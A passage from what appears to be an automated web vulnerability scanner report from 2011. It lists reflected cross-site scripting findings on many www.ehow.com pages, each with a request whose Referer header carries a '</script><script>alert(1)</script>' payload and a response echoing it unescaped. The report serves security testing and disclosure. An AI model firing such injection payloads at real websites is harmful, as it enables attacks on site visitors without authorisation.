Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_7992_floor-water-fountains-101.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=14171</script><script>alert(1)</script>ec64a979418

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:32 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=7992; expires=Thu, 02-Feb-2012 15:16:32 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38141

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Floor Water Fountains 101 | eHow.com
</title>
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "14171</script><script>alert(1)</script>ec64a979418";

       </script>
...[SNIP]...

4.687. http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_8016_outdoor-garden-fountains-guide.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14963</script><script>alert(1)</script>b358eea976 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_8016_outdoor-garden-fountains-guide.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=14963</script><script>alert(1)</script>b358eea976

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=8016; expires=Thu, 02-Feb-2012 15:16:07 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40923

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Outdoor Garden Fountains Guide | eHow.com
</ti
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "14963</script><script>alert(1)</script>b358eea976";

       </script>
...[SNIP]...

4.688. http://www.ehow.com/topic_8047_water-garden-fountains-101.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_8047_water-garden-fountains-101.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 506a1</script><script>alert(1)</script>22a7977a460 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_8047_water-garden-fountains-101.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=506a1</script><script>alert(1)</script>22a7977a460

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=8047; expires=Thu, 02-Feb-2012 15:16:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41438

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Water Garden Fountains 101 | eHow.com
</title>
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "506a1</script><script>alert(1)</script>22a7977a460";

       </script>
...[SNIP]...

4.689. http://www.ehow.com/toys-and-games/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/toys-and-games/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb9af</script><script>alert(1)</script>afc6118e907 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /toys-and-games/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=cb9af</script><script>alert(1)</script>afc6118e907

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72435

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Toys & Games - How To Information | eHow.com</tit
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "cb9af</script><script>alert(1)</script>afc6118e907";

       </script>
...[SNIP]...

4.690. http://www.ehow.com/unavailable.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/unavailable.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 512f2</script><script>alert(1)</script>feeb99e195a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /unavailable.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=512f2</script><script>alert(1)</script>feeb99e195a

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23094

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Browse How to Videos and How to Articles | ehow.c
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "512f2</script><script>alert(1)</script>feeb99e195a";

       </script>
...[SNIP]...

4.691. http://www.ehow.com/us-travel/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/us-travel/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dd94</script><script>alert(1)</script>26c420d0b66 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /us-travel/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9dd94</script><script>alert(1)</script>26c420d0b66

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75108

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>US Travel - How To Information | eHow.com</title>
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "9dd94</script><script>alert(1)</script>26c420d0b66";

       </script>
...[SNIP]...

4.692. http://www.ehow.com/vacations-and-travel-planning/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/vacations-and-travel-planning/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 554d2</script><script>alert(1)</script>ca7a2c01173 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /vacations-and-travel-planning/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=554d2</script><script>alert(1)</script>ca7a2c01173

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75405

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Vacations & Travel Planning - How To Information
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "554d2</script><script>alert(1)</script>ca7a2c01173";

       </script>
...[SNIP]...

4.693. http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/video_6598099_make-sugar-spice-scrub.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a348</script><script>alert(1)</script>3f3991beec1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /video_6598099_make-sugar-spice-scrub.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9a348</script><script>alert(1)</script>3f3991beec1

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83517

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Make a Sugar & Spice Scrub: Gorgeously Gre
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "9a348</script><script>alert(1)</script>3f3991beec1";

       </script>
...[SNIP]...

4.694. http://www.ehow.com/video_6976779_sensational-snacks.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/video_6976779_sensational-snacks.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0e92</script><script>alert(1)</script>0488b8fbc31 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /video_6976779_sensational-snacks.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=a0e92</script><script>alert(1)</script>0488b8fbc31

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:57 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74807

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Sensational Snacks: Cooking With Kids! | eHow.com
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "a0e92</script><script>alert(1)</script>0488b8fbc31";

       </script>
...[SNIP]...

4.695. http://www.ehow.com/video_7199214_onion-flatbread-recipe.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/video_7199214_onion-flatbread-recipe.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38ddd</script><script>alert(1)</script>7cb44e64c8b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /video_7199214_onion-flatbread-recipe.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=38ddd</script><script>alert(1)</script>7cb44e64c8b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84886

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Onion Flatbread Recipe: Grow. Cook. Eat. | eHow.c
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "38ddd</script><script>alert(1)</script>7cb44e64c8b";

       </script>
...[SNIP]...

4.696. http://www.ehow.com/videos.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/videos.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45ee5</script><script>alert(1)</script>a202cf207b6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /videos.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=45ee5</script><script>alert(1)</script>a202cf207b6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 81054

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How To Videos: Instructional, DIY & How To Video
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "45ee5</script><script>alert(1)</script>a202cf207b6";

       </script>
...[SNIP]...

4.697. http://www.ehow.com/weddings-and-parties/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/weddings-and-parties/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe1f3</script><script>alert(1)</script>bfeaf58b908 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /weddings-and-parties/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=fe1f3</script><script>alert(1)</script>bfeaf58b908

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72253

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Weddings & Parties - How To Information | eHow.co
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "fe1f3</script><script>alert(1)</script>bfeaf58b908";

       </script>
...[SNIP]...

4.698. http://www.ehow.com/weight-management-and-body-image/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/weight-management-and-body-image/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b840b</script><script>alert(1)</script>8ba33d5bdf1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /weight-management-and-body-image/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=b840b</script><script>alert(1)</script>8ba33d5bdf1

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72033

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Weight Management & Body Image - How To Informati
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "b840b</script><script>alert(1)</script>8ba33d5bdf1";

       </script>
...[SNIP]...

4.699. http://www.ehow.com/winterize-a-garden/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/winterize-a-garden/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1e97</script><script>alert(1)</script>0fc653e07d5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /winterize-a-garden/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e1e97</script><script>alert(1)</script>0fc653e07d5

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65547

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Winterize a Garden - eHow.com</title>
       <meta ch
